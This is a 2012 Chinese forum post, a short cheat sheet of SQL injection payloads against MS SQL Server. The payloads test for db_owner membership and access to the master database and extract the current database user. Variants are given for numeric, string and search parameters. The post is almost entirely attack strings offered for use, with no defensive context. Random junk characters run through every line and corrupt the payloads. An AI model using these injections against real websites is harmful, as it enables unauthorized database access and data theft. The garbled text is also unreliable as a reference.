标题: 常用的一些注入命令 [打印本页] 作者: admin 时间: 2012-9-15 14:40 标题: 常用的一些注入命令 //看看是什么权限的 / @" j- _! ?% |. S3 Qand 1=(Select IS_MEMBER('db_owner'))3 T8 t$ @4 c- ]8 p) b0 d* K, t r6 E
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--# q) i+ R1 J, ]3 c
! o7 r: { w! f. `6 R& w- I
//检测是否有读取某数据库的权限 & ]! l3 P3 g9 c) S: tand 1= (Select HAS_DBACCESS('master'))" R( t6 u' |+ o2 }1 G
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --4 g/ k. e0 ]$ R2 x6 I! E9 b" h
6 Y I' Z I. `
2 R. @; Y# J4 F0 E3 C数字类型9 g' s7 T9 K9 j8 l0 U8 Y
and char(124)%2Buser%2Bchar(124)=0, L) y& X+ z* I" C2 S( b
7 I& e# z; `; R4 M字符类型 m/ v/ q0 f5 O* K# Y
' and char(124)%2Buser%2Bchar(124)=0 and ''=', g. s: T4 v& \2 w1 o
+ K l9 p! h4 g% U% f' }6 C0 x
搜索类型: W6 @7 t& I2 X) v5 p
' and char(124)%2Buser%2Bchar(124)=0 and '%'='2 z# ]+ @9 n, v7 e8 l0 v
+ i; j4 b$ V$ T9 w8 ~
爆用户名 ! F u; F; W L. p) R' J- Oand user>0 3 G; v, n: B! F7 Y. }: C' and user>0 and ''='4 o E5 @/ g1 K5 [